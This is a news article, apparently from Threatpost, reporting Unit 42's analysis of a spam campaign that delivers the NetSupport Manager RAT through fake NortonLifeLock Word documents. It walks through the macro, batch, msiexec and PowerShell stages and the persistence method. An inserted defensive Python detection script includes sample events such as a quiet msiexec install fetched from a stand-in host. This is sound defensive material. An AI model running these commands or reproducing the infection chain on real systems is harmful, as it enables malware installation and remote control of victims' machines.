URL: https://threatpost.com/netsupport-manager-rat-nortonlifelock-docs/153387/

NETSUPPORT MANAGER RAT SPREAD VIA BOGUS NORTONLIFELOCK DOCS

Author: Tara Seals
March 2, 2020 4:59 pm
2 minute read

The legitimate remote-access tool is being used to maliciously infect victims
and allow remote code-execution.

The legitimate remote access tool (RAT) called NetSupport Manager, used for
troubleshooting and tech support, is being converted into a malicious weapon by
cybercriminals. Researchers at Palo Alto Networks’ Unit 42 division have spotted
a spam campaign attempting to deliver a malicious Microsoft Word document that
uses the disguise of a NortonLifeLock-protected file.

NortonLifeLock is a security utility for password-protecting attachments, among
other things. If a recipient opens the document via Microsoft Office Outlook, a
prompt appears that asks users to “enable content” to open the document –
clicking “yes” executes macros.

“To the user, the document appears to contain personal information that requires
a password to view,” said researchers, in a recent analysis. “Once the document
is opened and the user clicks ‘Enable Content,’ the macro is executed and the
user is presented with a password dialog box.”

Researchers added that the password is likely provided in the body of the
phishing email, because it has to be correct; no malicious activity occurs until
the correct key is entered. Once the key is accepted, the macros create and
execute a batch file called alpaca.bat.

“The macro obfuscates all strings using multiple labels on Visual Basic for
Applications (VBA) forms, which contain two characters that are eventually
linked together to construct the final command to download and execute the RAT
on the victim,” according to Unit 42. “The command string is executed via the
VBA shell function, which [creates and executes alpaca.bat].”

The campaign uses a range of tactics to hide its activity from both dynamic
and static analysis, according to researchers. For instance, the batch script
uses msiexec, a legitimate part of the Windows Installer service, to download
and install a Microsoft Intermediate Language (MSIL) binary from a legitimate
domain that has been compromised. Once downloaded, the binary is installed with
msiexec’s /q parameter, which suppresses any Windows dialogs the user would
otherwise see.

The campaign also uses the PowerSploit PowerShell framework to carry out the
installation of the malicious files. The MSI installs a PowerShell script named
REgistryMPZMZQYVXO.ps1 in the victim’s %temp% directory. This script contains
another PowerShell script that is responsible for installing the NetSupport
Manager RAT onto the victim’s machine.

“The PowerShell script appears to have been generated using the open-source
script Out-EncryptedScript.ps1 from the PowerSploit framework,” according to the
analysis. “It contains a blob of data that is obfuscated via base64 and is
TripleDES encrypted with a cipher mode of Cipher Block Chain (CBC).”

The RAT installer PowerShell script interestingly aborts installation if Avast
or AVG Antivirus Software is running on the target machine. If not, it installs
12 files that make up the NetSupport Manager RAT to a random directory and sets
up persistence by creating the following registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.

“Once the main NetSupport Manager executable (presentationhost.exe) is started,
it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of
the host followed by an HTTP POST,” the researchers wrote.
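The chain described above leaves a sequence of host artifacts that a defender can match independently of any one sample: an Office process launching a batch file, msiexec fetching an installer quietly over HTTP, PowerShell running a script out of %temp%, an HKCU Run value pointing into the user profile, and a copy of presentationhost.exe outside the Windows directory. As an added example (not code from Unit 42 or Threatpost), the Python below runs those five checks over constructed Sysmon-style events; the key=value line format, the compromised.example URL, the user paths and the random directory name are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events (not real telemetry): one simplified key=value line
# per process-creation or registry-set event, modelled on the chain above.
SAMPLE_EVENTS = [
    r'type=process image=C:\Windows\System32\cmd.exe cmdline="cmd /c alpaca.bat" parent=WINWORD.EXE',
    r'type=process image=C:\Windows\System32\msiexec.exe cmdline="msiexec /q /i http://compromised.example/x.msi" parent=cmd.exe',
    r'type=process image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -File C:\Users\u\AppData\Local\Temp\REgistryMPZMZQYVXO.ps1" parent=msiexec.exe',
    r'type=registry key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run value=Client data=C:\Users\u\AppData\Roaming\qzxv\presentationhost.exe',
    r'type=process image=C:\Users\u\AppData\Roaming\qzxv\presentationhost.exe cmdline="presentationhost.exe" parent=powershell.exe',
    r'type=process image=C:\Windows\System32\msiexec.exe cmdline="msiexec /i C:\installers\app.msi" parent=explorer.exe',  # benign local install
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')  # key=value or key="value with spaces"

def parse_event(line: str) -> Dict[str, str]:
    """Split one event line into a dict; quoted values may contain spaces."""
    return {k: (q or u) for k, q, u in _KV.findall(line)}

def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every rule this event trips (empty list = clean)."""
    hits: List[str] = []
    img = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "").lower()
    parent = ev.get("parent", "").lower()
    if ev.get("type") == "process":
        # An Office application launching a batch file: the macro's alpaca.bat stage.
        if parent in OFFICE_APPS and ".bat" in cmd:
            hits.append("office_spawns_batch")
        # msiexec pulling an installer from the network in quiet (/q) mode.
        if img.endswith("msiexec.exe") and re.search(r"\s/q", cmd) and "http" in cmd:
            hits.append("msiexec_quiet_remote_install")
        # PowerShell executing a .ps1 that was dropped into a Temp directory.
        if img.endswith("powershell.exe") and re.search(r"\\temp\\\S+\.ps1", cmd):
            hits.append("powershell_script_in_temp")
        # The genuine PresentationHost.exe lives under C:\Windows; a copy elsewhere is suspect.
        if img.endswith("\\presentationhost.exe") and not img.startswith("c:\\windows\\"):
            hits.append("presentationhost_outside_windows_dir")
    elif ev.get("type") == "registry":
        # HKCU ...\CurrentVersion\Run value whose target sits in a user-writable profile path.
        key = ev.get("key", "").lower()
        data = ev.get("data", "").lower()
        if key.endswith("\\currentversion\\run") and "\\appdata\\" in data:
            hits.append("hkcu_run_persistence_user_path")
    return hits

def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run every rule over every line and return (line index, rule name) pairs."""
    return [(i, r) for i, line in enumerate(lines) for r in check_event(parse_event(line))]
```

Any one of these hits is worth a look on its own; several of them within minutes on the same host, in this order, is the chain the article describes.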

Researchers said that the campaign is likely part of a larger offensive that
dates back to early November, with email subject lines reusing themes associated
with refunds, as well as transaction and order inquiries. The attached documents
contain the target company’s name.

“Malicious use of the NetSupport Manager remote access tool has also been
reported by both FireEye and Zscaler researchers,” researchers concluded. “While
this activity appears to be broad and at large scale, there are indications,
such as the document name, that show the actor’s attempt to provide a stronger
relationship to the target in an attempt to increase the success rate.”
